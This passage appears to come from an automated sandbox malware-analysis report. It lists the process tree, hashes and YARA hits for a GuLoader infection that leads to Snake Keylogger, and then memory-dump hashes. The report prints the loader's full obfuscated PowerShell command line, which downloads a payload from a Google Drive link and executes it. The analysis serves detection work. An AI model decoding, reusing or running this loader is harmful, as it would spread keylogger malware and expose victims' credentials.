Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:11:22:56
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:11:23:09
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
                                                                            Imagebase:0x470000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1722877673.0000000008160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1723278711.00000000089D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:11:23:09
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:11:23:30
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                            Imagebase:0x100000
                                                                            File size:59'904 bytes
                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Reset < >
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dfc008aa2b9309c348ad8d0877d6c84138741e61db1206da6080e649a4703dc
                                                                              • Instruction ID: 6e837968de87164ed39ce689714c18328f804e8a59200db36add3e442ad5af9c
                                                                              • Opcode Fuzzy Hash: 6dfc008aa2b9309c348ad8d0877d6c84138741e61db1206da6080e649a4703dc
                                                                              • Instruction Fuzzy Hash: 7582393190EBC54FE356AB7888512A4BFF1EF57721F5801FAC099CB1D7DA28A845C362
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9a8c08124d91529a83804fc784b8512ca1bb1b30a369515c5f3909dfe1232df0
                                                                              • Instruction ID: c759d7c19650f183e33fb5f2f260101946380a6391a8598de5558423a8a67b5e
                                                                              • Opcode Fuzzy Hash: 9a8c08124d91529a83804fc784b8512ca1bb1b30a369515c5f3909dfe1232df0
                                                                              • Instruction Fuzzy Hash: 4202053190EBC58FE796AB7888512A4FBF1EF57620F4801FEC159CB193DA289C49C352
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534429273.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bfed0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 192bc5102b2b7dd18d1df83b355d23044b07949778c0db336c8757cd2b86032b
                                                                              • Instruction ID: 469dd8d052531d56984c921f72150ee3c6b763bba4bd0f22dd5b78b911152f7c
                                                                              • Opcode Fuzzy Hash: 192bc5102b2b7dd18d1df83b355d23044b07949778c0db336c8757cd2b86032b
                                                                              • Instruction Fuzzy Hash: 40F1C430908A8D8FEBA8EF2CC8557F977D1FFA5310F44426AE84DC7695DB34A8458B81
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534429273.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bfed0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 998bb4a6788f07280d97ff5f3016df1af1744fc8e8c90b7caae240c3bf75882f
                                                                              • Instruction ID: b5c75212f3b9f7f9456ccb5d819672780e0325c720f343aa8323f234797ab885
                                                                              • Opcode Fuzzy Hash: 998bb4a6788f07280d97ff5f3016df1af1744fc8e8c90b7caae240c3bf75882f
                                                                              • Instruction Fuzzy Hash: CBE1B330908A8D8FEB68EF6CC8557F977E1EF95350F44426AE84DC7695CF38A8418B81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534429273.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bfed0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: {[s
                                                                              • API String ID: 0-1201519179
                                                                              • Opcode ID: d14470bbecf59289678f236acbc9ddd6f4dd74c64f943c99087fae642caa628e
                                                                              • Instruction ID: 47de3d99b4c146348bf24b279eae7766f3f73ab0e78b6660b3e929f3f05f6538
                                                                              • Opcode Fuzzy Hash: d14470bbecf59289678f236acbc9ddd6f4dd74c64f943c99087fae642caa628e
                                                                              • Instruction Fuzzy Hash: 40028430A08A4D8FDB98EF5CC455AEDBBE1FFA9310F54426AD40DD7296CA34E841CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6161db2c2fad26e4635ea51b5d7277fef6f6f18048cffd88a347bbb6367ac800
                                                                              • Instruction ID: 6160f2f37e9e04656ec2341e6aff78c32c2cc75a70441534e8dc5858e6df1a3d
                                                                              • Opcode Fuzzy Hash: 6161db2c2fad26e4635ea51b5d7277fef6f6f18048cffd88a347bbb6367ac800
                                                                              • Instruction Fuzzy Hash: 31F14721D0EBC64FE396AB6C58151B4BBE1EF53621B8812FED159C70E7D918A8068362
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9ef07b3d0971bd3ac47f145350dcc3c355254742104630077e7f2a30e0bafb76
                                                                              • Instruction ID: b75db47de14fae2fd8a2b14cce2de540d3d6cd3d11ba665567981ee1c2291f88
                                                                              • Opcode Fuzzy Hash: 9ef07b3d0971bd3ac47f145350dcc3c355254742104630077e7f2a30e0bafb76
                                                                              • Instruction Fuzzy Hash: D2E12631E0DA858FE795AB6C84552B8F7F1FF56A21F5802BEC00DC7187DE28AC498752
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4f82fd3de82f6a90dde673a64d352d79a7502dcf28829b7cf0c67eaa74cd549
                                                                              • Instruction ID: e22b0c6498866e907665bd3582bd91dea724f3953072b0807c10005a78aa6144
                                                                              • Opcode Fuzzy Hash: b4f82fd3de82f6a90dde673a64d352d79a7502dcf28829b7cf0c67eaa74cd549
                                                                              • Instruction Fuzzy Hash: FCC16A32E0DACA4FEB95AB6C88106B4BBE1EF56721B9411FAC15DC7193DE24AC02C351
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 45a2eeec77e10a51ab213283db06ff99c8fcab72bb0721110cf8c48b24b0de95
                                                                              • Instruction ID: 2ac863f9d393150bbdd93b8537ea42342e235670f8749819fa7a6ebcdebade14
                                                                              • Opcode Fuzzy Hash: 45a2eeec77e10a51ab213283db06ff99c8fcab72bb0721110cf8c48b24b0de95
                                                                              • Instruction Fuzzy Hash: A5C13521A0EBC64FE792AB7C48506B4BBF1EF67611B4802FBC159CB1D7D918AC09C361
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9341880f1d8a92846b54d479541d53b013638c353ce8a778abadf97a11b4d220
                                                                              • Instruction ID: ea9997b5a351c137ce17caca1478cf539acfa9b9f130b287349cc55ec5d34ff3
                                                                              • Opcode Fuzzy Hash: 9341880f1d8a92846b54d479541d53b013638c353ce8a778abadf97a11b4d220
                                                                              • Instruction Fuzzy Hash: 91A12631E0EACA8FE795AB6C48145B5BBF1EF56621B8C11FAC11DC71D3D914AC04C761
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534429273.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bfed0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 27d93f730917e2c3d52c2755abb99c67e99da2a75493e401fb00dd0569aa62d3
                                                                              • Instruction ID: f614610f39b93b58749246582dc9d5c8730c9a4620763991a8f65ca99688d64f
                                                                              • Opcode Fuzzy Hash: 27d93f730917e2c3d52c2755abb99c67e99da2a75493e401fb00dd0569aa62d3
                                                                              • Instruction Fuzzy Hash: 7EB1D430908A8D8FDB68EF28C8557F97BE1FF55350F44426AE84DC7696DF34A8418B82
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b99b9b0043c7e7e0e3d8427d6feaed0e72504333295e9c6b36ce5426168822ed
                                                                              • Instruction ID: a3ccccf26f7593c47dc5c08d72d23ef4a54779001bd5ddfa138040aa37352a82
                                                                              • Opcode Fuzzy Hash: b99b9b0043c7e7e0e3d8427d6feaed0e72504333295e9c6b36ce5426168822ed
                                                                              • Instruction Fuzzy Hash: 1161D831A0EBC58FD7569B7858541E5FFB1EF57211B0901FBC159CB0A3CA28A84AC7A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 769df352d4b3b80fb99c39e655d682232805eeee56239b21d398ff5a68877102
                                                                              • Instruction ID: e5105022e0612c2800253c754d9b5202d5532a60ff1f71479560aee33f522f19
                                                                              • Opcode Fuzzy Hash: 769df352d4b3b80fb99c39e655d682232805eeee56239b21d398ff5a68877102
                                                                              • Instruction Fuzzy Hash: 7E41C52160EBC59FD743EB7844641A4FFB0FF17215B4901EBC199CB0A3DA285C49C751
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c03c113b4abec9bcc1d206f710095f6dc05b3b2f536173c74b93fcb40410be5f
                                                                              • Instruction ID: c37dfee6982ec785ef248a677a4f5510da045ebd7dc09054b611a5cd9c29ca0a
                                                                              • Opcode Fuzzy Hash: c03c113b4abec9bcc1d206f710095f6dc05b3b2f536173c74b93fcb40410be5f
                                                                              • Instruction Fuzzy Hash: EA310B22D1FECA8FE795A76C18111F8F6E0AF16A61B9C22B9D12DD31C7DE185C048761
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 510c93af0e8e4822c0d133c07d5f1c119df0033461a4f7bcde44c564dee496bf
                                                                              • Instruction ID: 7aa04c34b6a00db163535894504438f24113641d024d416e2057edec57474da0
                                                                              • Opcode Fuzzy Hash: 510c93af0e8e4822c0d133c07d5f1c119df0033461a4f7bcde44c564dee496bf
                                                                              • Instruction Fuzzy Hash: 73210B31E0EEC64FE395A76C68511F4A2E1EF67A22BC811BDD11DC71E7DD18AC058315
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534429273.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bfed0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e27dec2c786f69c84a4c75d35f577debbfd4d8a5d9f98cb5febc5bc4ff4de1ff
                                                                              • Instruction ID: 2d41c6799be34583a9ac6165028367d3de0c0e77deed1267dbe5aa39174e61ea
                                                                              • Opcode Fuzzy Hash: e27dec2c786f69c84a4c75d35f577debbfd4d8a5d9f98cb5febc5bc4ff4de1ff
                                                                              • Instruction Fuzzy Hash: 6731613481858DCEFBB4AF59CC06BF87294FF92715F84013AD51D86496DB386945CB21
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534972704.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bffa0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 270c795f15b3ccc1a8281cf418df9db91c1f4d3f43d5398c924211c1efa1394c
                                                                              • Instruction ID: 2fef7234aa6a5079d42a53ec60ce64cb5747e44131217090551758b0315c6847
                                                                              • Opcode Fuzzy Hash: 270c795f15b3ccc1a8281cf418df9db91c1f4d3f43d5398c924211c1efa1394c
                                                                              • Instruction Fuzzy Hash: 25216B21E0FACA5FE354AB7C04141B8BBE0EF6AA61B4805FEC09CC70D7CD285809C761
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1534429273.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7bfed0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                              • Instruction ID: be8577960205414060da53b6937d0437e50332a2fe069a423b80c234b80aae7b
                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                              • Instruction Fuzzy Hash: B701A73010CB0C4FD744EF0CE051AB6B3E0FB95364F10066EE58AC3665D636E882CB41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1687303569.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_29e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \Vzj
                                                                              • API String ID: 0-2954437694
                                                                              • Opcode ID: dcccd966999441d3f68e3d2602fb7ec5e731c0c9f446530bf8d5e2230c543ae3
                                                                              • Instruction ID: b9af5e1c94f5e8c0daa0ae56589436dce48d86a272f014ec16b81717d9801504
                                                                              • Opcode Fuzzy Hash: dcccd966999441d3f68e3d2602fb7ec5e731c0c9f446530bf8d5e2230c543ae3
                                                                              • Instruction Fuzzy Hash: E3B15D70E00209CFDF11CFA9D8857AEBBF6BF88714F148529E856AB254EB749845CF81
                                                                              Memory Dump Source
